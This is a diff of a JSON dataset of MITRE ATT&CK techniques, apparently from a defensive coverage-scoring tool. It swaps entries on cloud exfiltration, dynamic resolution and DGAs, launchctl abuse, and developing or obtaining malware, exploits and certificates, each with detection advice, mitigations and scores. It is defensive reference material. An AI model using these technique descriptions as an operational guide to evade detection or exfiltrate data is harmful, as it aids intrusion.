-                "name": "Exfiltration Over Web Service: Exfiltration to Cloud Storage",
-                "url": "https://attack.mitre.org/techniques/T1567/002",
-                "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
-                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
+                "tid": "T1587.002",
+                "name": "Develop Capabilities: Code Signing Certificates",
+                "url": "https://attack.mitre.org/techniques/T1587/002",
+                "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.",
+                "detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
                 "mitigations": [
                     {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1587.003",
+                "name": "Develop Capabilities: Digital Certificates",
+                "url": "https://attack.mitre.org/techniques/T1587/003",
+                "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
+                "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+                "mitigations": [
+                    {
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1587.004",
+                "name": "Develop Capabilities: Exploits",
+                "url": "https://attack.mitre.org/techniques/T1587/004",
+                "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                "mitigations": [
+                    {
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1057",
-                "name": "Data Loss Prevention",
-                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                "url": "https://attack.mitre.org/mitigations/M1057"
-            },
-            {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.3047619047619048,
-        "adjusted_score": 0.3047619047619048,
+        "cumulative_score": 0.09761904761904762,
+        "adjusted_score": 0.09761904761904762,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "2.3",
-            "2.5",
-            "9.3"
-        ],
-        "nist_controls": [
-            "AC-16",
-            "AC-2",
-            "AC-20",
-            "AC-23",
-            "AC-3",
-            "AC-4",
-            "AC-6",
-            "CA-3",
-            "CA-7",
-            "SA-8",
-            "SA-9",
-            "SC-28",
-            "SC-31",
-            "SC-7",
-            "SI-3",
-            "SI-4",
-            "SR-4"
-        ],
-        "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.20476190476190478,
-            "mitigation_score": 0.36363636363636365,
-            "detection_score": 0.03
+            "combined_score": 0.047619047619047616,
+            "detection_score": 0.1
         },
-        "choke_point_score": 0.1,
+        "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1568",
-        "name": "Dynamic Resolution",
-        "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
-        "url": "https://attack.mitre.org/techniques/T1568",
+        "tid": "T1587.001",
+        "name": "Develop Capabilities: Malware",
+        "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)",
+        "url": "https://attack.mitre.org/techniques/T1587/001",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Malware Repository: Malware Content",
+            "Malware Repository: Malware Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1587",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1587.002",
+        "name": "Develop Capabilities: Code Signing Certificates",
+        "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.",
+        "url": "https://attack.mitre.org/techniques/T1587/002",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Malware Repository: Malware Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1587",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05952380952380953,
+        "adjusted_score": 0.05952380952380953,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1587.003",
+        "name": "Develop Capabilities: Digital Certificates",
+        "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
+        "url": "https://attack.mitre.org/techniques/T1587/003",
         "tactics": [
-            "Command And Control"
+            "Resource Development"
         ],
-        "detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.",
+        "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1568.001",
-                "name": "Dynamic Resolution: Fast Flux DNS",
-                "url": "https://attack.mitre.org/techniques/T1568/001",
-                "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.",
-                "detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1568.002",
-                "name": "Dynamic Resolution: Domain Generation Algorithms",
-                "url": "https://attack.mitre.org/techniques/T1568/002",
-                "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
-                "detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    }
-                ]
-            },
-            {
-                "tid": "T1568.003",
-                "name": "Dynamic Resolution: DNS Calculation",
-                "url": "https://attack.mitre.org/techniques/T1568/003",
-                "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)",
-                "detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
-                "mitigations": []
-            }
+            "Internet Scan: Response Content"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1587",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.2547619047619048,
-        "adjusted_score": 0.2547619047619048,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "9.2",
-            "13.3",
-            "13.8"
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1587.004",
+        "name": "Develop Capabilities: Exploits",
+        "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+        "url": "https://attack.mitre.org/techniques/T1587/004",
+        "tactics": [
+            "Resource Development"
         ],
-        "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "SC-20",
-            "SC-21",
-            "SC-22",
-            "SC-7",
-            "SI-3",
-            "SI-4"
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1587",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
         ],
+        "cumulative_score": 0.06428571428571428,
+        "adjusted_score": 0.06428571428571428,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.10476190476190478,
-            "mitigation_score": 0.2
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1569",
-        "name": "System Services",
-        "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.",
-        "url": "https://attack.mitre.org/techniques/T1569",
+        "tid": "T1588",
+        "name": "Obtain Capabilities",
+        "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)",
+        "url": "https://attack.mitre.org/techniques/T1588",
         "tactics": [
-            "Execution"
+            "Resource Development"
         ],
-        "detection": "Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.",
+        "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.",
         "platforms": [
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Modification",
-            "Process: Process Creation",
-            "Service: Service Creation",
-            "Windows Registry: Windows Registry Key Modification"
+            "Certificate: Certificate Registration",
+            "Internet Scan: Response Content",
+            "Malware Repository: Malware Content",
+            "Malware Repository: Malware Metadata"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1569.001",
-                "name": "System Services: Launchctl",
-                "url": "https://attack.mitre.org/techniques/T1569/001",
-                "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n",
-                "detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.",
+                "tid": "T1588.001",
+                "name": "Obtain Capabilities: Malware",
+                "url": "https://attack.mitre.org/techniques/T1588/001",
+                "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).",
